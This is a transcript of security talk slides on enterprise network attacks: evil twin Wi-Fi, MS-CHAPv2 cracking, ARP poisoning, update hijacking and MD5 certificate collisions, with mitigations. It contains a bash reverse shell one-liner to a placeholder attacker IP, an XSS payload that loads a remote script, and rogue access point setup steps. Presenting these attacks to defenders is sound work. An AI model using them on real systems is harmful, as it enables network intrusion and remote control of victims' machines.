Breaking Bad: Enterprise Network Security

Post on 13-Apr-2017

Transcript of Breaking Bad: Enterprise Network Security

Enterprise Network Security

Navneet Kumar

Overview

• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis: MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack

Note: Some images in this presentation have been taken from the web for illustration

SilverFish Worm

XSS

NPAPI runtime

Shell

<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')

masterPlugin.updatePlugin("attacker-plugin", success, failure)

Netcat Shell / ssh daemon / Bonjour

Hatching rate = n^g

n = Average # of endpoints per meeting
g = # of generation

g=0

g=1

g=2

802.11

ARP

Target Protocols

Attack Vectors

802.11

Evil twin attack

Fake Certificate Exchange

Soft AP

• Put WNIC in Master Mode and use forged CA cert
• Configure AP SSID to "bjn-int"
• Deauth to actual AP

Network

• Setup DNS
• Setup DHCP

Routing

• Redirect 80, 443 packets to proxy port
• Forward traffic after NAT

Capture

• Use same CA cert for signing
• Sniff in proxy

Attack Setup

Note: Chrome uses certificate pinning for *.google.com

Fake BSSID

Highest Strength, 2.4 GHz Channel

Wireless Scan

Victim’s Client

WTF !!!

Certificate Forgery

Soft AP DHCP

Routing Proxy

Cryptanalysis of MS-CHAPv2

ChallengeHash = SHA1(random || username)[0:8]

ChallengeHash

ChallengeResponse

Note: Original complexity analysis has been done by Moxie Marlinspike

Cryptanalysis of MS-CHAPv2

NT hash split into DES keys: 7 byte | 7 byte | 2 byte

Complexity = 2^56

time < 24 hrs (100% success)
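Worked derivation of the 2^56 figure above (added here, not part of the original slides; it follows the structure of the analysis the note attributes to Moxie Marlinspike and assumes the standard MS-CHAPv2 response construction):

The 16-byte NT hash is padded with 5 zero bytes to 21 bytes and split into three DES keys:
$$K_1 \,\|\, K_2 \,\|\, K_3 = \mathrm{NTHash} \,\|\, 0^{5}, \qquad |K_1| = |K_2| = 7 \text{ bytes}, \quad K_3 = k_3 \,\|\, 0^{5} \ (\text{2 unknown bytes})$$

Each key encrypts the same 8-byte ChallengeHash (CH):
$$\mathrm{ChallengeResponse} = \mathrm{DES}_{K_1}(\mathrm{CH}) \,\|\, \mathrm{DES}_{K_2}(\mathrm{CH}) \,\|\, \mathrm{DES}_{K_3}(\mathrm{CH})$$

A naive search costs $2^{56} + 2^{56} + 2^{16}$. Since $K_1$ and $K_2$ encrypt the same plaintext, one pass over the $2^{56}$ DES key space tests each candidate against both ciphertext blocks at once, so
$$\text{Complexity} = 2^{56} + 2^{16} \approx 2^{56}$$
The search is exhaustive, which is why the success rate is 100% rather than probabilistic.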

ARP poisoning

POST-MITM Attack Vectors

Reverse Shell

Bind Shell

Session Hijacking

Above L3 Attacks

Reverse Bind Shell

• Gives a network shell to the attacker
• Works behind NAT
• Gets root access

HOW ????

$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1

https://tools.google.com/service/update2

https://swdl.bluejeans.com

https://aus4.mozilla.org/update/*/update.xml

smb://MVAV01/SophosUpdate

(Auto)Updates

Deploy payload with updates

Mitigation

Pre-deployment of enterprise wide CA

SSL Cert Pinning for updates

Proper WIPS Configuration

Arp Spoof Mitigations

Careful CA signing

Certificate Collision Attack

[Diagram: Certificate Collision Attack]

CA → DomainA, isCA? → CSR → E_key[SHA(csr.tbs)] → Certificate (CSR.TBS)

SHA(domainA.csr) vs SHA(domainB.csr)
md5(domainA.csr) vs md5(domainB.csr)
True / False

MD5 Collision → Certificate Collision